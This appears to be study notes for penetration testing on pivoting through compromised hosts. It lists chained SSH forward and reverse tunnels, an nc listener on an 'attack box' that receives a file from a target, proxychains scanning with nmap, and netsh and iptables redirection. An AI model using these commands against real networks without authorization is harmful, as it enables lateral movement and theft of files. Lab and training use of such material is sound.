Tunneling
SSH
-M Places the SSH client into “Master” mode for connection sharing
-S Create a Slave connection using a previously set up Master connection
-Specifies the location of a control socket for connection sharing
-L Setting up for a future connection (forward tunnel)
-R Reverse tunnel
ssh -M -S /tmp/T1 user@[1st Target IP] -p [Target 1 SSH port] -L [RHP1]:[2nd Target IP]:[Target 2 SSH Port]
ssh -M -S /tmp/T2 user@127.0.0.1 -p [RHP1] -L [RHP2]:[3rd Target IP]:[Target 3 SSH Port]
ssh -M -S /tmp/T3 user@127.0.0.1 -p [RHP2]
Example:
ssh -M -S /tmp/T1 root@10.0.0.1 -p 22 -L 14002:10.0.0.2:22
ssh -M -S /tmp/T2 admin@127.0.0.1 -p 14002 -L 14003:10.0.0.3:22
ssh -M -S /tmp/T3 vyos@127.0.0.1 -p 14003
All these masters are set up and connected
*You can now open a new terminal to T2 above (without opening a separate connection) using -S
ssh -S /tmp/T2 admin@127.0.0.1 -p 14002
Reverse:
ssh -M -S /tmp/T3 vyos@127.0.0.1 -p 14003 -R 14002:0.0.0.0:14002
Nc listener on attack box to receive file from Target 4 : nc -lvpn 14002 > [file.txt]
Banner Grab
When you find a new IP of interest, add the forward connection to your already created master SSH connection
Already created Master: ssh -M -S /tmp/t1 user@[Target 1 IP] -p 22
add the forward: ssh -S /tmp/t1 user@[Target 1 IP] -p 22 -L 14002:[newly found ip]:22
telnet 127.0.0.1 14002
nc -vn 127.0.0.1 14002
ProxyChains
Set up
add -D 9050 (default port) -N -f to end of your SSH commands
qqq
configuration (you can add more): /etc/proxychains.conf
default: socks4 127.0.0.1 9050
Close Proxychains ssh connection
ssh -S /tmp/T1 -O cancel -D 9050 user@127.0.0.1 -p 22
Scanning with Proxychains
proxychains nc -nz [IP] [port range]
proxychains nmap -sT -Pn [IP] [port range]
NetSH
netsh port forwarding:
netsh interface portproxy add v4tov4 listenport=6969 connectaddress=[forwardIP] connectport=22
-This sets up firewall rule to foward traffic
netsh interface portproxy show all
Listen on ipv4: Connect to ipv4:
Address Port Address Port
------------ ------- ------------ ------
0.0.0.0 6969 10.169.0.9 22
Create a new forward on Target 2
ssh -S /tmp/t2 -p 14002 -L 14003:10.169.0.9:6969
Then connect to T3 through newly established forward tunnel
ssh -M -S /tmp/t3 [username]@127.0.0.1 -p 14003
Show current portproxy rules
netsh interface portproxy show all
Delete
netsh interface portproxy delete v4tov4 listenport=6969 listenaddress=[forward IP] protocol=tcp
netsh interface portproxy reset
netsh advfirewall firewall delete rule name=""
IPTables Redirection
Prerouting rules:
iptables -A PREROUTING -t nat -s <kalibox> -d <redirIP> -p tcp --dport <targetport> -j DNAT --to-destination <targetIP>:<targetPort>
Explained: if you see anything coming from <kalibox> with the destination <redirIP> destined for <targetport> send it to <targetIP> with <targetPort>
Reverse Translation:
iptables -A PREROUTING -t nat -s <targetIP> -d <redirIP> -p tcp -j DNAT --to-destination <kaliBox>
Explained: if you see anything coming from <targetIP> with the destination <redirIP> send it to <kaliBox>
Note: can specify --to-dport so it’ll just be from a specific port rather than a full take of traffic from the <targetIP>
Postrouting Source IP changes:
Explained: The source IP has not changed yet so you need to add postrouting so it’ll go from <targetIP> to <redirIP> to <kaliBox>
KaliBox to Target:
iptables -A POSTROUTING -t nat -s <kalibox> -d <targetIP> -p tcp -j SNAT --to-source <redirIP>
Explained: Anything coming from the <kalibox> that’s destined for the <targetIP> change the source address to the <redirIP>
Target to KaliBox
iptables -A POSTROUTING -t nat -s <targetIP> -d <kalibox> -p tcp -j SNAT --to-source <redirIP>
Explained: Anything coming from the <targetip> destined for the <kalibox> set the source address to the <redirip>